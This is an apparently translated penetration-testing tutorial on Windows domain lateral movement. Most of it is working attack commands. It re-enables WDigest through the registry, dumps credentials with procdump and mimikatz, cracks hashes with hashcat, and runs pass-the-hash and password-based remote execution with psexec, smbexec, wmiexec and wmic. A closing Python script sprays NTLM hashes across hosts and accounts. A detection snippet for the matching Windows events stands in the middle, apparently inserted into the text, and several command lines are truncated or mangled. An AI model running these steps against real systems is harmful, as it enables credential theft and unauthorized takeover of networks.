
8.18 Domain lateral movement: SMB & WMI plaintext or hash passing

Popularity: 36 / 2024-09-05 23:27:16

Knowledge point 1:

Windows 2012 and above disable WDigest by default, so an attacker cannot obtain plaintext passwords from memory;

On Windows 2012 and below, if the KB287199 patch is installed, plaintext passwords likewise cannot be obtained from memory;

Workarounds:

1. Lateral movement by passing the hash (PtH, PtK, etc.)

2. Passing the hash over other service protocols (SMB, WMI, etc.)

3. Turning WDigest Auth back on through the registry so that plaintext can be obtained again

4. Cracking the hash with tools or third-party platforms (Hashcat)

Knowledge Point 2:

Windows uses the LM Hash and NTLM Hash algorithms; client systems after Windows Vista and server systems after Windows 2003 all authenticate with NTLM Hash.

Registry modification to turn on WDigest Auth:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Obtaining credentials with Procdump (official Microsoft tool) + Mimikatz

Advantage: also covers some Windows local policy and account management cases; once the dump file is obtained, it can be decrypted locally with mimikatz;
Switching drive in cmd: cd /d [target path]

When mimikatz fails to retrieve the password, use procdump to retrieve it.

1. Generate a .dmp file containing the password hashes

procdump -accepteula -ma

2. Load the dmp file in mimikatz and run:

privilege::debug

Log console output to a file: log

sekurlsa::minidump

sekurlsa::logonPasswords full

Two other tools for extracting passwords:

Pwdump7

QuarksPwdump

Cracking Windows NTLM hashes with Hashcat

    hashcat -a 0 -m 1000 [hash file] --force

The tool supports cracking many other hash types as well.

32ed87bdb5fdc5e9cba88547376818d4

Remote execution over the SMB service by passing a plaintext password or hash; the only requirement is that port 445 is open;

1. psexec, first method (from PsTools): establish an IPC$ connection first, then run psexec; requires plaintext or hash

An IPC$ connection is needed first; -s runs with SYSTEM privileges

net use \\[IP]\ipc$ "[password]" /user:[username]

net use \\192.168.79.132\ipc$ lcn#123456 /user:\Administrator #Establish TCP connection

psexec \\192.168.79.132 -s cmd

2. psexec, second method: no IPC$ connection needed; supply the plaintext account and password directly

psexec \\[IP] -u [username] -p [password] -s cmd

psexec \\192.168.79.132 -u administrator -p lcn#123456 -s cmd

-hashes :[password hash] ./[username]@[IP]

-hashes :b7f2f7b2491ba316e8cd773f8c2d58df ./[email protected]

-hashes :$HASH$ ./[email protected]

-hashes :[password hash] [domain]/[username]@[IP]

-hashes :$HASH$ domain/[email protected]

Failed attempt.

The official PsTools cannot connect with a hash; use the impacket toolkit instead, which is convenient but easily flagged by antivirus

3. smbexec: no IPC$ connection needed; pass plaintext or hash directly

smbexec [domain]/[username]:[password]@[IP]

smbexec /administrator:lcn#[email protected]

smbexec ./[username]:[password]@[IP]

smbexec ./administrator:lcn#[email protected]

smbexec -hashes :[password hash] ./[username]@[IP]

smbexec -hashes :$HASH$ ./lcn#[email protected]

smbexec -hashes :[password hash] [domain]/[username]@[IP]

smbexec -hashes :$HASH$ /[email protected]

smbexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df /[email protected]

The psexec module from the impacket toolkit works the same way:

psexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df  /[email protected]

How to distinguish local users from domain users

net user: local users
net user /domain: domain users; the domain name is required when connecting as a domain user;

Domain lateral movement using the WMI service: cscript, wmiexec, wmic

WMI (Windows Management Instrumentation): exploited via port 135; supports authentication with a plaintext password or a hash, and the method leaves no trace in the target's logging system.

1. Built-in WMIC, plaintext only, no output returned

wmic /node:[IP] /user:[username] /password:[password] process call create "[command]"

wmic /node:192.168.79.130 /user:administrator /password:admin@123 process call create " /c ipconfig >C:\"

(Run cmd, execute ipconfig and output the result to the C drive)

2. Built-in cscript, plaintext only, output returned; requires downloading the accompanying script

cscript //nologo /shell [IP] [username] [password]

cscript //nologo /shell 192.168.79.130 administrator admin@123

Returns a shell

3. impacket wmiexec, plaintext or hash, output returned; the exe version may be flagged by antivirus

wmiexec ./[username]:[password]@[IP] "[command]"

wmiexec ./administrator:lcn#[email protected] "whoami"

wmiexec [domain]/[username]:[password]@[IP] "[command]"

wmiexec /administrator:lcn#[email protected] "whoami"

wmiexec -hashes :[password hash] ./[username]@[IP] "[command]"

wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[email protected] "whoami"

wmiexec -hashes :[password hash] [domain]/[username]@[IP] "[command]"

wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 god/[email protected] "whoami"
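The psexec, smbexec and wmiexec commands above each produce host-side Windows events that a defender can correlate: an NTLM network logon (4624), a service installed by PsExec or smbexec (7045), and wmiexec's cmd.exe spawned under WmiPrvSE.exe with output redirected to an admin share (4688). The following Python is an added detection example, not code from the original post; the event records are constructed samples in a simplified key=value layout, and the service names PSEXESVC and BTOBTO are assumed to be the tools' public defaults.

```python
import re

# Constructed sample Windows events (not real captures), flattened to
# "Key=value Key=value ..." text so the example runs offline.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 AuthenticationPackageName=NTLM "
    "LogonProcessName=NtLmSsp KeyLength=0 TargetUserName=administrator IpAddress=192.168.79.128",
    "EventID=4624 LogonType=3 AuthenticationPackageName=Kerberos "
    "LogonProcessName=Kerberos KeyLength=0 TargetUserName=userlu IpAddress=192.168.79.129",
    "EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe",
    "EventID=7045 ServiceName=BTOBTO ImagePath=%COMSPEC% /Q /c echo cd ^> \\\\127.0.0.1\\C$\\__output 2^>^&1",
    "EventID=4688 ParentProcessName=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "NewProcessName=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1725000000 2>&1",
]
# Service names installed by Sysinternals PsExec and impacket smbexec
# (assumption: the tools' public default names).
SUSPICIOUS_SERVICES = {"PSEXESVC", "BTOBTO"}

def parse_event(line):
    """Split 'Key=value ...' into a dict; values may contain spaces."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"(\w+)=(.*?)(?= \w+=|$)", line)}

def classify(event):
    """Return heuristic labels for one parsed event (empty list if clean)."""
    labels = []
    eid = event.get("EventID")
    # NTLM network logon with no session key: what psexec/smbexec/wmiexec -hashes
    # produce, but benign NTLM logons look alike, so correlate before alerting.
    if (eid == "4624" and event.get("LogonType") == "3"
            and event.get("AuthenticationPackageName") == "NTLM"
            and event.get("KeyLength") == "0"):
        labels.append("ntlm_network_logon")
    if eid == "7045" and event.get("ServiceName", "").upper() in SUSPICIOUS_SERVICES:
        labels.append("remote_exec_service_install")
    if eid == "4688":
        parent = event.get("ParentProcessName", "").lower()
        cmdline = event.get("CommandLine", "").lower()
        # wmiexec spawns cmd.exe under WmiPrvSE.exe and redirects output to ADMIN$ over loopback
        if parent.endswith("wmiprvse.exe") and "127.0.0.1\\admin$" in cmdline:
            labels.append("wmiexec_pattern")
    return labels

def scan(lines):
    """Indices of suspicious lines mapped to their labels; clean lines are omitted."""
    labelled = ((i, classify(parse_event(l))) for i, l in enumerate(lines))
    return {i: labels for i, labels in labelled if labels}
```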

Batch use of the above services with hashes for domain lateral movement: Python script compiled to exe

Batch lateral-movement attempts using an exe built from a Python script

Approach to lateral movement on the intranet:

1. Collect plaintext passwords or hashes with mimikatz; collect domain usernames with "net user /domain"; discover live hosts in the domain with "for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL=""

2. Scan in batches and spray the collected passwords

3. Collect more passwords

4. Repeat steps 2 and 3
```python
import os
import time

# Target hosts, account names and NTLM hashes to try
ips = {
    '192.168.79.128',
    '192.168.79.129',
    '192.168.79.130',
    '192.168.79.132'
}
users = {
    'admin',
    'Administrator',
    'administrator',
    'userlu',
    'testuser',
    'juligan'
}
hashs = {
    '579da618cfbfa85247acf1f800a280a4',
    'b7f2f7b2491ba316e8cd773f8c2d58df'
}
'''
passs = {
    'admin@123', 'admin!123', 'admin#123', 'lcn#123456'}
'''
for ip in ips:
    for user in users:
        for ntlm_hash in hashs:
            # wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[email protected] "whoami"
            cmd = "wmiexec -hashes :" + ntlm_hash + ' ./' + user + '@' + ip + ' "whoami"'
            print('--》' + cmd + '《--')
            os.system(cmd)   # run the command (the imports show os.system/time.sleep were intended)
            time.sleep(1)
```


### Resources involved:

Hashcat:/hashcat/hashcat

Password cracking all-in-one tool: Hashcat password-cracking cheat sheet:/sectool/

mimikatz:/gentilkiwi/mimikatz

impacket:/SecureAuthCorp/impacket

impacket-examples-windows:/RichChigga/impacket-examples-windows

PsTools:/zh-cn/sysinternals/downloads/pstools

ProcDump:/zh-cn/sysinternals/downloads/procdump

/realdeveloperongithub/K8tools/blob/master/

(looking for two):/mirrors/K8tools/blob/master/